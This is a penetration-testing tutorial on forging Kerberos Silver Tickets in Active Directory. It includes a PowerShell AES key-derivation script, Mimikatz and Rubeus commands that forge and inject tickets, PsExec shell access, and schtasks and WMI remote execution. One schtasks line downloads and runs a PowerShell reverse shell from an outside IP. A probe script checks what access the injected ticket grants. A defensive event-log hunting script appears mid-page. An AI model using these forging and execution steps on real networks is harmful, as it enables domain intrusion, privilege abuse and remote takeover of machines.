The Silver Ticket attack consists of forging a valid TGS (service ticket) for a specific service once the long-term key of the account running that service is known, typically the NTLM hash of the computer account that hosts the service. With that key an attacker can craft a TGS for any user and any group membership and present it directly to the service; the KDC is never contacted, so no ticket request for the forged TGS is ever logged on a Domain Controller.
In this case, the NTLM hash of a computer account (which is a special kind of user account in AD) is available, so a ticket can be forged to get into that machine with administrator privileges through the SMB service. Keep in mind that computer accounts reset their passwords every 30 days by default, so a stolen machine account key stops working after the next rotation.
Tickets can also be forged with the AES Kerberos keys of the service account (AES128 or AES256) instead of its NTLM/RC4 hash, which is what modern domains negotiate by default. To learn how an AES key is derived from a password, read section 4.4 of MS-KILE or the Get-KerberosAESKey.ps1 script.
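The derivation MS-KILE and Get-KerberosAESKey.ps1 describe is short enough to reproduce: PBKDF2-HMAC-SHA1 over the UTF-8 password with the account's salt, followed by the RFC 3962 "DK" step (AES-encrypting the 128-bit n-fold of the string "kerberos" with the intermediate key). The following PowerShell is an added example written for this page, not code from the original page or from Get-KerberosAESKey.ps1; the realm, account names and password are made up, and the known-answer check uses the RFC 3962 Appendix B vector (iteration count 1, password "password", salt "ATHENA.MIT.EDUraeburn").

```powershell
# Derive AES128/AES256 Kerberos keys (RFC 3962) for an AD account from its
# password and salt. Added example for this page; realm/account names are made up.

function Get-KerberosSalt {
    param(
        [Parameter(Mandatory)][string]$Realm,           # e.g. jurassic.park
        [Parameter(Mandatory)][string]$SamAccountName   # e.g. stegosaurus or LABWWS02$
    )
    # MS-KILE 3.1.1.2: user salt   = REALM(upper) + sAMAccountName (case preserved)
    #                  computer salt = REALM(upper) + "host" + hostname(lower) + "." + realm(lower)
    if ($SamAccountName.EndsWith('$')) {
        $hostName = $SamAccountName.TrimEnd('$').ToLowerInvariant()
        return $Realm.ToUpperInvariant() + 'host' + $hostName + '.' + $Realm.ToLowerInvariant()
    }
    return $Realm.ToUpperInvariant() + $SamAccountName
}

function Get-KerberosAesKey {
    param(
        [Parameter(Mandatory)][string]$Password,
        [Parameter(Mandatory)][string]$Salt,
        [ValidateSet(16, 32)][int]$KeyLength = 32,   # 16 = AES128, 32 = AES256
        [int]$Iterations = 4096                       # AD uses the RFC 3962 default count
    )
    $utf8 = [System.Text.Encoding]::UTF8

    # Step 1: tkey = PBKDF2-HMAC-SHA1(password, salt, iterations, KeyLength bytes)
    $pbkdf2 = [System.Security.Cryptography.Rfc2898DeriveBytes]::new(
        $utf8.GetBytes($Password), $utf8.GetBytes($Salt), $Iterations)
    $tkey = $pbkdf2.GetBytes($KeyLength)

    # Step 2: key = DK(tkey, "kerberos"). The constant is the 128-bit n-fold of
    # "kerberos" (RFC 3961 A.1). Each output block is the AES encryption of the
    # previous block with a zero IV, which for a single block is plain ECB.
    $nfoldHex = '6b65726265726f737b9b5b2b93132b93'
    $block = [byte[]]::new(16)
    for ($i = 0; $i -lt 16; $i++) { $block[$i] = [Convert]::ToByte($nfoldHex.Substring(2 * $i, 2), 16) }

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::None
    $aes.Key     = $tkey                       # 16 bytes -> AES-128, 32 bytes -> AES-256

    $key = New-Object System.Collections.Generic.List[byte]
    while ($key.Count -lt $KeyLength) {
        # fresh encryptor per block so the transform state never carries over
        $block = $aes.CreateEncryptor().TransformFinalBlock($block, 0, 16)
        $key.AddRange($block)
    }
    $aes.Dispose()
    return ($key.ToArray()[0..($KeyLength - 1)] | ForEach-Object { $_.ToString('x2') }) -join ''
}

function Test-KerberosAesKeyDerivation {
    # Known-answer test from RFC 3962 Appendix B (iteration count 1).
    $k128 = Get-KerberosAesKey -Password 'password' -Salt 'ATHENA.MIT.EDUraeburn' -KeyLength 16 -Iterations 1
    $k256 = Get-KerberosAesKey -Password 'password' -Salt 'ATHENA.MIT.EDUraeburn' -KeyLength 32 -Iterations 1
    return ($k128 -eq '42263c6e89f4fc28b8df68ee09799f15') -and
           ($k256 -eq 'fe697b52bc0d3ce14432ba036a92e65bbb52280990a2fa27883998d72af30161')
}

# Usage (made-up account): salt for a computer account, then its AES256 key.
$salt = Get-KerberosSalt -Realm 'jurassic.park' -SamAccountName 'LABWWS02$'   # JURASSIC.PARKhostlabwws02.jurassic.park
Get-KerberosAesKey -Password 'Sup3rS3cretMachinePassw0rd' -Salt $salt -KeyLength 32
Test-KerberosAesKeyDerivation
```

The salt is the part people get wrong: for a computer account it is built from the lowercase hostname and realm with the literal prefix "host", not from the sAMAccountName as stored, so a key derived with the user-style salt will be rejected by the service. The resulting hex string is what Mimikatz expects in /aes128 or /aes256 in place of /rc4.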
On Windows, Mimikatz can be used to craft the ticket. The ticket is then injected into the current logon session with Mimikatz or Rubeus, and finally a remote shell can be obtained with PsExec.
Windows
#Create the ticket
mimikatz.exe "kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park"
#Inject in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt ticket.kirbi"
.\Rubeus.exe ptt /ticket:ticket.kirbi
#Obtain a shell
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
The CIFS service is the one that grants access to the file system of the victim. Other service classes are listed at https://adsecurity.org/?page_id=183. For example, a ticket for the HOST service lets you create a scheduled task on the computer; check that it worked by listing the tasks of the victim with schtasks /S <hostname>. A ticket for HOST together with a ticket for RPCSS lets you run WMI queries on the computer; test it with Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>.
Mitigation
Silver ticket event IDs (stealthier than a golden ticket, because the forged TGS is presented straight to the service and the KDC never sees a request it could log):
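The stealth works both ways for a defender: the host still records the logon, but no Domain Controller records a service ticket request for it. The following PowerShell is an added detection example written for this page, not code from the original page: it pulls Kerberos network logons (event 4624, logon type 3) from a host and service ticket requests (event 4769) for that host's computer account from every DC, and reports logons with no ticket request behind them. It assumes "Audit Logon" is enabled on the host and "Audit Kerberos Service Ticket Operations" on the DCs, and that the hostname's first label is the computer account name; the names in the usage line are made up.

```powershell
# Hunt for silver-ticket use: Kerberos network logons (4624) on a host that have
# no matching service ticket request (4769) on any Domain Controller.
# Added example for this page; host and DC names in the usage line are made up.
function Find-SilverTicketLogons {
    param(
        [Parameter(Mandatory)][string]$Computer,            # host whose Security log is inspected
        [Parameter(Mandatory)][string[]]$DomainController,  # all DCs: a 4769 may land on any of them
        [datetime]$Since = (Get-Date).AddHours(-24),
        [int]$TicketLifetimeHours = 10                      # default maximum service ticket lifetime
    )

    # Flatten an event's EventData into a hashtable keyed by field name
    function ConvertTo-EventData($Event) {
        $xml = [xml]$Event.ToXml()
        $h = @{ TimeCreated = $Event.TimeCreated }
        foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
        return $h
    }

    # Kerberos network logons as seen by the host itself
    $logons = Get-WinEvent -ComputerName $Computer -FilterHashtable @{
            LogName = 'Security'; Id = 4624; StartTime = $Since } -ErrorAction Stop |
        ForEach-Object { ConvertTo-EventData $_ } |
        Where-Object { $_.LogonType -eq '3' -and $_.AuthenticationPackageName -eq 'Kerberos' }

    # Service tickets the DCs issued for this host's computer account (ServiceName is HOSTNAME$).
    # Look back one full ticket lifetime before $Since: a cached TGS can be older than the logon.
    $hostAccount = $Computer.Split('.')[0].ToUpperInvariant() + '$'
    $tgs = foreach ($dc in $DomainController) {
        Get-WinEvent -ComputerName $dc -FilterHashtable @{
                LogName = 'Security'; Id = 4769
                StartTime = $Since.AddHours(-$TicketLifetimeHours) } -ErrorAction SilentlyContinue |
            ForEach-Object { ConvertTo-EventData $_ } |
            Where-Object { $_.ServiceName -eq $hostAccount }
    }

    foreach ($l in $logons) {
        # 4769 TargetUserName is user@REALM; 4624 TargetUserName is the bare account name
        $match = $tgs | Where-Object {
            $_.TargetUserName.Split('@')[0] -eq $l.TargetUserName -and
            $_.TimeCreated -le $l.TimeCreated -and
            $_.TimeCreated -ge $l.TimeCreated.AddHours(-$TicketLifetimeHours)
        }
        if (-not $match) {
            [pscustomobject]@{
                Time     = $l.TimeCreated
                Account  = "$($l.TargetDomainName)\$($l.TargetUserName)"
                SourceIP = $l.IpAddress
                Finding  = 'Kerberos logon with no TGS request on any DC (possible silver ticket)'
            }
        }
    }
}

# Usage (made-up names): run from a host with read access to the Security logs.
Find-SilverTicketLogons -Computer 'labwws02.jurassic.park' -DomainController 'dc01.jurassic.park', 'dc02.jurassic.park'
```

Two caveats a practitioner should expect: if any DC is missed or its log has rolled over, legitimate logons show up as findings, and a forged ticket that impersonates an account which also has a genuine TGS for the same host within the lifetime window is not flagged. The check is therefore a triage signal, not proof on its own.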
In the following examples, let's assume the ticket was forged impersonating the Administrator account.
CIFS
With a CIFS ticket you can access the C$ and ADMIN$ shares via SMB (if they are exposed) and copy files to any location on the remote filesystem:
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
A CIFS ticket is also what PsExec needs to obtain a shell inside the host or execute arbitrary commands, as shown in the Windows section above.
HOST
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create a scheduled task: first one runs an exe, second one downloads and runs a PowerShell reverse shell
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://172.16.100.114:8080/pc.ps1')"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run the created task now
schtasks /Run /S some.vuln.pc /TN "SomeTaskName"
HOST + RPCSS
#Check you have enough privileges
Get-WmiObject -Class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod -Class win32_process -ComputerName remote.computer.local -Name create -ArgumentList "$RunCommand"
#You can also use wmic
wmic /node:remote.computer.local os list full /format:list
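Which service classes a forged ticket actually covers is easy to get wrong (WMI, for instance, fails with only a HOST ticket). The following PowerShell is an added example written for this page, not code from the original page: after the ticket(s) have been injected with Mimikatz or Rubeus, it confirms the ticket is in the logon session and probes the CIFS, HOST and HOST+RPCSS paths described above, returning one object with the outcome of each. The host name in the usage line is made up.

```powershell
# Probe what a freshly injected silver ticket grants on the target.
# Added example for this page; the target name in the usage line is made up.
function Test-SilverTicketAccess {
    param([Parameter(Mandatory)][string]$Target)   # FQDN used in /target when forging

    $result = [ordered]@{ Target = $Target }

    # 0. Is a ticket for the target present in the current logon session? (klist lists
    #    "Server: <class>/<fqdn> @ <realm>" for every cached service ticket)
    $klist = (klist 2>$null) | Out-String
    $result.TicketCached = [bool]($klist -match [regex]::Escape($Target))

    # 1. CIFS ticket: file system access through the administrative shares
    $result.CIFS = (Test-Path "\\$Target\C$") -and (Test-Path "\\$Target\ADMIN$")

    # 2. HOST ticket: remote Task Scheduler (schtasks exits non-zero when access is denied)
    $null = schtasks /query /S $Target 2>&1
    $result.HOST_Schtasks = ($LASTEXITCODE -eq 0)

    # 3. HOST + RPCSS tickets: WMI needs both classes injected; one alone is refused
    try {
        $os = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $Target -ErrorAction Stop
        $result.WMI = $true
        $result.RemoteOS = $os.Caption
    } catch {
        $result.WMI = $false
        $result.WMIError = $_.Exception.Message
    }

    return [pscustomobject]$result
}

# Usage (made-up target), run in the session where the ticket was injected:
Test-SilverTicketAccess -Target 'labwws02.jurassic.park'
```

Run it once per ticket you inject: a CIFS-only ticket should show CIFS true and the other two false, which is the quickest way to tell a wrong SPN class from a wrong key. If even TicketCached is false, the injection failed (check with klist and that Rubeus/Mimikatz ran in the same logon session).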